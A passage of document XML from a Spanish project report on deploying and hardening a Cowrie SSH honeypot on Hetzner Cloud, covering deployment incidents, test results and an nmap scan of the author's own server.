        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de la Reserva de Memoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El programa oci-keepalive.py se ejecutó reservando un 5 % de la memoria de la máquina de pruebas (7,8 GiB). Informó de una reserva de 402 MiB y el tamaño residente del proceso (VmRSS) fue de 420 MB, lo que confirma que la memoria está ocupada físicamente y no solo reservada. Al recibir la señal SIGTERM, que es la que envía systemd para detener un servicio, el proceso terminó de forma ordenada en un par de segundos, el tiempo necesario para liberar la memoria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Despliegue en Hetzner Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El 4 de octubre de 2026 se creó el servidor en Hetzner Cloud y se ejecutó el script de bastionado. Ese mismo día se instaló Cowrie y se activó la redirección del puerto 22, con lo que comenzó la captura. El despliegue real sacó a la luz tres incidencias que las pruebas locales no detectaron: dos dependían del sistema del proveedor y la tercera, del entorno en que systemd ejecuta los servicios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Incidencia: Validación de sshd en Ubuntu 24.04</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En la primera ejecución, el script se detuvo al configurar el SSH con el mensaje «Missing privilege separation directory: /run/sshd» y deshizo el cambio. La configuración era correcta: el fallo se debía a que Ubuntu 24.04 arranca sshd por activación de socket, y el directorio /run/sshd solo existe mientras el servicio está en marcha. La validación previa con sshd -t lo exige, y al no encontrarlo daba la configuración por errónea.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El comportamiento del script en ese momento fue el diseñado: ante cualquier duda sobre la configuración del SSH, revertir el cambio y no reiniciar el servicio, de modo que la sesión del administrador nunca llegó a correr peligro. La corrección consistió en crear el directorio antes de validar. Al relanzar el script, completó el resto de pasos sin repetir los ya hechos, gracias a su diseño idempotente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Incidencia: Clave SSH sin Frase Conocida</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El servidor se creó inicialmente con una clave SSH existente en el equipo del administrador cuya frase de paso no se recordaba, por lo que no fue posible acceder. Como el servidor estaba recién creado y vacío, la solución más segura fue generar una clave ed25519 nueva y dedicada al proyecto, guardar su frase en el gestor de contraseñas en el momento de crearla y volver a crear el servidor con ella. La lección aplicada es usar una clave distinta por proyecto o servicio, con su frase registrada desde el principio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Incidencia: Cowrie no Arrancaba como Servicio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script de instalación terminó con el mensaje «Cowrie no arranca», gracias a la comprobación final que verifica que el servicio está activo y escucha en el puerto 2222. El registro del servicio mostraba un FileNotFoundError: el programa cowrie start lanza a su vez twistd buscándolo en el PATH, y systemd no activa el entorno virtual de Python donde está instalado. En las pruebas locales no apareció porque Cowrie se arrancaba con el entorno virtual ya activado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Corregido el PATH, apareció un segundo fallo que el primero ocultaba: en primer plano, twistd escribe por defecto un fichero twistd.pid en el directorio de trabajo, y el confinamiento del servicio (ProtectHome=read-only) deja ese directorio en solo lectura. Ambos fallos se reprodujeron en local con Cowrie 3.1.0 antes de corregirlos. La solución fue que el servicio ejecute directamente twistd con su ruta completa y la opción --pidfile= vacía, ya que systemd conoce el PID del proceso y el fichero no aporta nada. Así se mantuvo intacto el confinamiento, en lugar de relajarlo para que el servicio arrancase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La incidencia confirma el valor de que los scripts comprueben el resultado y no solo ejecuten pasos: sin esa comprobación, la instalación habría parecido correcta y el honeypot habría expuesto un puerto sin servicio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultados del Bastionado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tras la segunda ejecución del script, el usuario diego accede por el puerto 2022 con la clave dedicada. Al instalar iptables-persistent, el sistema desinstaló automáticamente UFW, que venía instalado pero inactivo en la imagen de Hetzner, lo que confirma la incompatibilidad entre ambas herramientas comentada en el capítulo de Tecnología.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultados de la Instalación de Cowrie y la Exposición</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Las pruebas realizadas en el servidor el 4 de octubre, todas con captura de pantalla, fueron las siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El acceso SSH como root al puerto 2022 es rechazado (R01F02).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tras reiniciar el servidor, las reglas de iptables se mantienen y el SSH real solo escucha en el puerto 2022.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba local de Cowrie en el puerto 2222: la contraseña root es rechazada, la contraseña prueba da acceso con la identidad web-prod-02, y los intentos y comandos quedan registrados en cowrie.json.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba externa desde el equipo del administrador: la conexión al puerto 22 aterriza en Cowrie con la identidad web-prod-02, y el registro en directo muestra el login y los comandos con la IP pública de origen (R02F01T03P01).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Las sesiones de prueba quedan en el registro junto con los ataques reales. Para que no alteren las estadísticas, el analizador excluye siempre las conexiones desde localhost y admite la opción --exclude-ip para descartar la IP pública del administrador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaneo Externo con nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El 7 de octubre se escanearon desde el exterior los puertos 1 a 3000 del servidor con nmap 7.98 (nmap -Pn -sT -sV), para comprobar qué ve un atacante (R01F02T01P01):</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588"/>
        <w:gridCol w:w="2381"/>
        <w:gridCol w:w="3969"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Estado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Servicio identificado por nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Abierto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenSSH 9.2p1 Debian 2+deb12u5 (Cowrie)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2022/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Abierto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenSSH 9.6p1 Ubuntu 3ubuntu13.19 (SSH real)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resto (2998)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Filtrado, sin respuesta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 14. Resultado del escaneo externo con nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El resultado confirma tres aspectos. Solo los dos puertos previstos son visibles. Cowrie supera la detección de versiones de nmap, que lo identifica como el OpenSSH de un Debian 12, la identidad configurada. Y el motivo «no-response» de los puertos filtrados demuestra que el Cloud Firewall de Hetzner está aplicado: si solo actuase el iptables del servidor, la regla REJECT devolvería un mensaje ICMP y nmap mostraría otro motivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El escaneo revela también una debilidad: el puerto 2022 se identifica como Ubuntu y el 22 como Debian, de modo que un atacante que compare ambos puede deducir que en la misma IP conviven dos sistemas distintos y sospechar del honeypot. La mitigación propuesta es restringir en el Cloud Firewall el puerto 2022 a la IP del administrador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pruebas Pendientes en el Servidor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queda pendiente la siguiente prueba de la tabla RFTP, que se documentará con sus capturas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataque controlado desde Kali Linux con hydra y verificación en cowrie.json (CU-03).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
